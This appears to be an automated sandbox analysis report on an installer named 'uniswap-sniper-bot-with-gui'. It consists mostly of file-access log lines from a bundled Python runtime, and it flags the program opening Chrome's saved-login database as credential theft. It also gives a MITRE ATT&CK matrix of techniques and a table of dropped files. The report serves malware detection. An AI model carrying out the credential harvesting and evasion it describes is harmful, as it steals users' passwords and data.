Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\copyreg.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\copyreg.cpython-311.pyc.1470113595664 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\struct.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\struct.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\struct.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\struct.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\struct.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\struct.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\struct.cpython-311.pyc.1470113596000 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\platform.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\platform.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\platform.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\platform.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\platform.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\platform.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\platform.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\platform.cpython-311.pyc.1470113597120 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\subprocess.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\subprocess.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\subprocess.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\subprocess.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\subprocess.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\subprocess.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\subprocess.cpython-311.pyc.1470113599248 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\locale.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\locale.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\locale.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\locale.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\locale.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\locale.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\locale.cpython-311.pyc.1470113601264 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\signal.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\signal.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\signal.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\signal.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\signal.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\signal.cpython-311.pyc.1470113604512 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\threading.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\threading.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\threading.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\threading.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\threading.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\threading.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\threading.cpython-311.pyc.1470113604512 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\_weakrefset.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\_weakrefset.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\_weakrefset.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\_weakrefset.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\_weakrefset.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\_weakrefset.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\_weakrefset.cpython-311.pyc.1470113609440 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\warnings.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\warnings.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\warnings.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\warnings.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\warnings.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\warnings.cpython-311.pyc.1470113608432 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\contextlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\contextlib.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\contextlib.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\contextlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\contextlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\contextlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__pycache__\__init__.cpython-311.pyc.1470121761728 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__pycache__\__init__.cpython-311.pyc.1470121763168 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__future__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__future__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\__future__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\__future__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__future__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__future__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__future__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\__future__.cpython-311.pyc.1470121465360 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__pycache__\__init__.cpython-311.pyc.1470113787568 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\traceback.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\traceback.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\traceback.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\traceback.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\traceback.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\traceback.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\traceback.cpython-311.pyc.1470121467712 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\abc.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\abc.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__\abc.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__\abc.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\abc.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\abc.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\abc.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__\abc.cpython-311.pyc.1470113782576 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\linecache.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\linecache.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\linecache.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\linecache.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\linecache.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\linecache.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\linecache.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\linecache.cpython-311.pyc.1470122871248 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\tokenize.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\tokenize.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\tokenize.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\tokenize.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\tokenize.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\tokenize.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\tokenize.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\aliases.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\aliases.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\utf_8.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\utf_8.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Windows Service	1 Windows Service	11 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	12 Process Injection	21 Virtualization/Sandbox Evasion	11 Input Capture	3 Process Discovery	Remote Desktop Protocol	1 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	12 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	24 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
uniswap-sniper-bot-with-gui Setup 1.0.0.exe	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\.pyp\DLLs\_asyncio.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_bz2.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_decimal.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_elementtree.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_lzma.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_msi.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_multiprocessing.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_overlapped.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_queue.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_socket.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_ssl.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_uuid.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\_zoneinfo.pyd	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\libffi-8.dll	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\libssl-1_1.dll	0%	ReversingLabs
C:\Users\user\.pyp\DLLs\pyexpat.pyd	0%	ReversingLabs
